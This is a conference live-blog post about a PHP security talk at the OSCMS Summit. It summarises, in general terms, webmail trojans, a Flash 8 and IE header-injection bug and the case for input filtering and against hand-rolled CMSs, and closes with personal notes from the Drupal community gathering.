Rasmus is explaining how someone made a javascript trojan horse for webmail services that is capable of compromising your home firewall and turn your computer into a zombie. By reading email. It's been closed by Yahoo Mail, but I think I just heard everyone in the room gasp and shudder.

Rasmus' summary: "What this means is that you should never, ever click on a link."

Everyone laughed, but it was a nervous laugh.

He's going on to explain the essential nature of checking user input before you display it. The Drupal community has internalized the importance of that kind of filtering for a while, but there's still a large pool of folks that aren't familiar with the 'why' behind a lot of Drupal's more restrictive output management. It's good to see a speaker instilling some serious fear around the whole "Just whip out some code that does X..." approach.

Rasmus: "We should try to build software that, when it's badly configured, fails rather than exposing important information."

After explaining the huge frightening array of secholes that can be exploited, he popped up a "CMS Report Card" on all the CMS packages that are represented at the summit. Every single project had some sort of security hole. Drupal's was a bit esoteric, requiring Flash 8 and a copy of Internet Explorer.

Rasmus: "It's really hard to find a commercial CMS vendor whose site actually uses their product."

Interesting random bits: a bug in Flash 8, combined with IE, allows a flash author to inject arbitrary stuff into the HTTP header -- which doesn't seem like a problem, but the headers are often implicitly trusted, used for retrieving cookies, and even mapping requests to virtualhosts. What does that mean? An attacker, with a malicious Flash file, can grab arbitrary cookies, jump over to other virtualhosts on the same machine, etc.

Acrobat also has similar holes -- I didn't realize that Yahoo had ripped out pdfs from their site entirely in order to avoid that sechole.

Rasmus: "When I'm surfing around to find hackable sites, I love to find hand-rolled CMS systems. I know I can hack them in a heartbeat. If I see a site is running on Drupal, or Joomla!, or another CMS? I know there may be a hole, but as soon as they fix that hole, everyone using them is safe."

The lesson? Don't write your own CMS. You have better things to do with your life.

Blogging live from the OSCMS Summit in Sunnyvale, hosted by Yahoo. I arrived Monday night and it's been a nonstop parade of wacky with the rest of the Lullabots and all the other Drupal folks I'm finally getting a chance to meet up with. I met Dries, which was fun, followed by Karoly (the infamous chx!) last night, and a pile of other notable folks like sepeck, UnConeD, walkah, KarenS... I'll never catch all the names, but it's definitely cool.

Tuesday, the Bots and I drove into the mountains of California to visit Skywalker Ranch, the fortified compound of awesomeness built by George Lucas. It was gorgeous -- an awesome perk of working with Lullabot -- and I posted a hundred plus photos to flickr from our tour; the folks there are doing really awesome stuff for education, and seeing them roll out a successful site with Drupal is loads of fun. Also, we kidnapped ewoks.

So I'm sitting in Rasmus' PHP performance and security talk now, surrounded by other geeks with their laptops out. It's fun, fun stuff and I'll be posting more stuff as it happens.

Viva la Drupal!